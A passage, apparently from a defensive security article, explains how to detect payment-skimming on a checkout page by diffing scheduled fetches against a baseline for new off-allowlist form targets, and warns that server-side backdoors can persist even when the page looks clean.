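Run this against a fetched copy of the live checkout page on a schedule and diff the output against a known-good baseline; a new off-allowlist `form` target is the signal that matches the fake payment popup behaviour described above. Because the backdoors Sansec found were in server-side files, a clean page report does not mean the server is clean, only that the page served at that moment carried no visible loader.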
